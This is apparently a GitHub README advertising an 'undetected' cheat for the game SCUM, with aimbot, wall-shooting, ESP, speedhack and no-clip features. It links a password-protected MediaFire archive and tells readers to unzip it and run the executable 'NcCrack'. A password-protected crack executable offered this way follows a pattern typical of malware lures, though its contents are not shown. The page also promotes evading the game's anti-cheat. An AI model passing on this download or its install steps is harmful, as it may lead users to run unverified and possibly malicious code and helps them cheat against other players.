# CRACK-HACK-for-SCUM-Magic-Aim-Silent-Aim-Visuals-Misc-UNDETECTED

-----------------------------------------------------------------------------------------------------------------------

# Download Soft

|[Download](https://www.mediafire.com/file/4ly70cowgor2rj5/NcCrack.zip/file)|
|:-------------|
Passwrod: `2077`

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Intel & Amd Processor

-----------------------------------------------------------------------------------------------------------------------

# Anti-cheat status
-  anti-cheat game
-  EAC: Undetected
# Game version
- Latest version for PC [Steam]


# AIMBOT:

- Silent aim (Aimbot without pointing at players, all bullets will fly right on target)
- Magic aim (Shooting through walls, bullets flying straight at the target)
- Visible check (Visibility check for the Aimbot)
- Show circle (Sight display)
- Aim key (Bind keys for the Aimbot)
- Aim FOV (Damage Radius for the Aimbot)

# ESP (Players, Zombies, Robots, Animals, Transport):

Names (Name display)
- Distance (Distance)
- Health (Health level)
- Skeleton (Players' Skeleton)
- Visible check (Visibility check)
- Corpses (Corpses)

# Visuals (Loot with filters) Loot with filters:

- Names (Name display)
- Distance (Distance)

# MISC:

Crosshair (Sight)
- Squad info (Displaying the player's squad via Player information table)
- Player information table (Currently shows only the item in the player's hands)
- Speedhack
- No collision (Disabling the player's collision, makes it possible to pass through walls)
- No recoil (Anti-recoil)
- No spread (Anti-spread)
- Always day (Always day)
- Fov changer (Changing the field of view)
- Easy lockpicking (lockpicking)
- Take item (Take an item that is at a distance in your hands)
- Teleport Item (Teleporting items to yourself)

# SETTINGS:

- Save (Save settings)
- Load (Loading settings)
- Unload (Complete deactivation of the cheat from the game)

![2b8bG8M](https://user-images.githubusercontent.com/123106706/215342863-1d0dbea5-a966-47df-a0ca-372e02bd2b72.jpg)
![6ECq7RX](https://user-images.githubusercontent.com/123106706/215342876-37bfda35-4b2d-4986-b6a8-c813b6d7225b.jpg)
![9hLQDO6](https://user-images.githubusercontent.com/123106706/215342877-ce2746eb-01c4-4801-98e9-35fdb1b876c9.jpg)
![FWF2raI](https://user-images.githubusercontent.com/123106706/215342890-9589484c-5866-4e5a-b7bb-554ec9abeae4.jpg)
![o5171ry](https://user-images.githubusercontent.com/123106706/215342896-ab077918-f344-4b8a-8b50-20178733de2a.jpg)





